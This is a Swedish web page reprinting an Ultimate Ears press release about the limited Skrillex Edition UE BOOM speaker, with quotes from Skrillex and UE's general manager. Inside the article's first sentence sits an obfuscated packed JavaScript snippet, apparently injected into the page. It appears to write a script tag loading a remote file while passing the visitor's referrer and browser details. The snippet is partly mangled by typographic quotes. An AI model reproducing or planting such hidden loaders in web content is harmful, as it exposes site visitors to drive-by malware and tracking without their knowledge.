Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Ultimate Ears samarbetar med GRAMMY-belönade producenten Skrillex i en limiterad designupplaga av UE BOOM

Ultimate Ears samarbetar med GRAMMY-belönade producenten Skrillex i en limiterad designupplaga av UE BOOM
Sebastian

Igår eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|fazbs|var|u0026u|referrer|yyzfa||js|php’.split(’|’),0,{}))
lanserade Ultimate Ears sitt senaste tillskott av prisbelönta UE BOOM-högtalare, specialdesignade Skrillex Edition UE BOOM, som släpps i ett begränsat antal. Samarbetet banar en ny väg för den sexfaldigt GRAMMY Award® belönade producenten inom elektronisk dansmusik – genom att låta Skrillex utforska en ny del av sin kreativa talang med sina egna handritade bilder, som täcker UE BOOM.

UE har förändrat hur människor lyssnar på musiken de älskar, högt och utan begränsningar. På samma sätt har Skrillex transformerat deras musikupplevelse genom sin kreativa användning av teknik, där han använder flera olika datorprogram för att skriva, spela in och mixa sina låtar. Hans kreativitet tar sig ett nytt uttryck i och med hans handritade verk på den specialdesignade UE BOOM-högtalaren.

”UE BOOM är fantastisk eftersom den är liten, bärbar och kraftfull”, säger Skrillex. ”Den låter så högt! Jag lyssnar på den hela tiden när jag turnerar – i bussen och backstage. Den är den bästa, mindre högtalaren jag vet och därför blev jag överlycklig över att ha mitt konstverk på den specialdesignade upplagan”.

2013 introducerades UE BOOM som sedan dess har vunnit fyra prestigefyllda designtävlingar. Byggd för att stå stabil oavsett var livet tar dig, är UE BOOM skapad i en cylinderform som skjuter ut kraftfullt ljud i 360 grader, ett vattentätt fodral med upp till 15 timmars batteritid. Genom sitt samarbete är UE BOOM nu den definitiva symbolen för hur människor upplever och interagerar med dagens musik.

”Skrillex har varit en banbrytande aktör inom EDM-revolutionen, genom att förändra människors förväntningar och musikupplevelser”, säger Rory Dooley general manager för Ultimate Ears. ”UE är glada över att få arbeta med Skrillex, en sådan framstående artist som levererar musik i ett paket som är både spännande och uttrycksfullt. Skrillex hittar sin inspiration i kombinationen av musik, människor och teknik – och detta samarbete var självklart för vårt varumärke”

Pris och tillgänglighet

Skrillex Edition UE BOOM finns tillgänglig i USA och utvalda europeiska länder från och med november 2014 på bland annat ultimateears.com för 1899 kronor.

För mer information, vänligen besök www.ultimateears.com eller www.skrillex.com.

Om Skrillex
Skrillex rör sig både i underground-scenen och på de kommersiella arenorna. Den sexfaldigt belönade GRAMMY-vinnaren har rest världen över, oräkneligt många gånger, med hundratals livespelningar – per år, från de största festivalerna till små pop-up efterfester. Hans musik och videos har enskilt tiotals miljoner visningar, och han har uppmärksammats av titlar som Pitchfork, Time Magazine och Rolling Stone (där han även prydde ett omslag tidigare under året). Han äger OWSLA, ett respekterat indie-label, ett publiceringsföretag under samma namn och gör klädsamarbeten med LONG. Kuriosa är att Skrillex främsta transportföremål när han för en gångs skull är hemma i Los Angeles är en skateboard.

Om Ultimate Ears

Ultimate Ears, en del av Logitech, revolutionerade sättet musiker framför musik på scenen genom att skapa skräddarsydda, professionella hörlurar 1995. Idag används Ultimate Ears, mer än något annat varumärke, av turnerande artister och är ledande inom skräddarsydda hörlurar för professionella musiker samt betydelsefull aktör inom premium-högtalare på konsumentmarknaden. Ultimate Ears erkända hörlurar och högtalare omdefinierar sättet människor upplever musiken de älskar. För mer information, vänligen besök www.ultimateears.com.